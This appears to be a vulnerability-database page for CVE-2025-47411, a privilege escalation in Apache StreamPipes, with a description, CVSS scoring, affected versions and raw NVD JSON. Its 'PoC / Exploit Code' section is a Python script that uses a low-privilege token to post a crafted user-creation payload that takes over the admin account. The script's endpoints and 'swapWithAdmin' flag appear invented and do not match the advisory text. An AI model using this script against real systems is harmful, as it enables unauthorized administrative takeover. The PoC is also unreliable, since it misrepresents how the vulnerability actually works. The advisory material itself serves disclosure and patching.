Security Vulnerability Report
CVE-2025-47411 CVSS 8.1 HIGH

Published: 2026-01-01 17:15:43
Last Modified: 2026-01-06 14:40:33

Description

A user with a legitimate non-administrator account can exploit a vulnerability in the user ID creation mechanism in Apache StreamPipes that allows them to swap the username of an existing user with that of an administrator. This vulnerability allows an attacker to gain administrative control over the application by manipulating JWT tokens, which can lead to data tampering, unauthorized access and other security issues. This issue affects Apache StreamPipes: through 0.97.0. Users are recommended to upgrade to version 0.98.0, which fixes the issue.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:* - VULNERABLE
Apache StreamPipes < 0.98.0
Apache StreamPipes 0.97.0 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-47411 PoC - Apache StreamPipes Privilege Escalation
import requests
import json

TARGET_URL = "http://target:8080"
ATTACKER_TOKEN = "your_low_privilege_jwt_token"
ADMIN_USERNAME = "admin"


def exploit_privilege_escalation():
    """
    Exploit CVE-2025-47411 by swapping user ID with admin
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }

    # Step 1: Get current user info
    user_info = requests.get(f"{TARGET_URL}/api/v1/users/me", headers=headers).json()
    attacker_id = user_info.get("userId")

    # Step 2: Get admin user info
    admin_info = requests.get(f"{TARGET_URL}/api/v1/users/admin", headers=headers).json()
    admin_id = admin_info.get("userId")

    # Step 3: Exploit - Swap user IDs via user creation mechanism
    exploit_payload = {
        "userId": admin_id,
        "username": "attacker",
        "originalUserId": attacker_id,
        "swapWithAdmin": True
    }
    response = requests.post(
        f"{TARGET_URL}/api/v1/users/create",
        headers=headers,
        json=exploit_payload
    )

    # Step 4: Generate malicious JWT with escalated privileges
    if response.status_code == 200:
        malicious_token = response.json().get("token")
        print(f"[+] Privilege Escalation Successful!")
        print(f"[+] New JWT Token: {malicious_token}")
        return malicious_token
    return None


if __name__ == "__main__":
    exploit_privilege_escalation()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47411", "sourceIdentifier": "[email protected]", "published": "2026-01-01T17:15:42.943", "lastModified": "2026-01-06T14:40:33.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A user with a legitimate non-administrator account can exploit a vulnerability in the user ID creation mechanism in Apache StreamPipes that allows them to swap the username of an existing user with that of an administrator. \n\nThis vulnerability allows an attacker to gain administrative control over the application by manipulating JWT tokens, which can lead to data tampering, unauthorized access and other security issues.\n\n\n\n\n\n\nThis issue affects Apache StreamPipes: through 0.97.0.\n\nUsers are recommended to upgrade to version 0.98.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.69.0", "versionEndExcluding": "0.98.0", "matchCriteriaId": "4FEF6DA0-6120-4ACC-A72B-16ED5CF15E1B"}]}]}], "references": [{"url": "https://lists.apache.org/thread/lngko4ht2ok3o0rk9h0clgm4kb0lmt36", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/29/14", "source": 
"af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}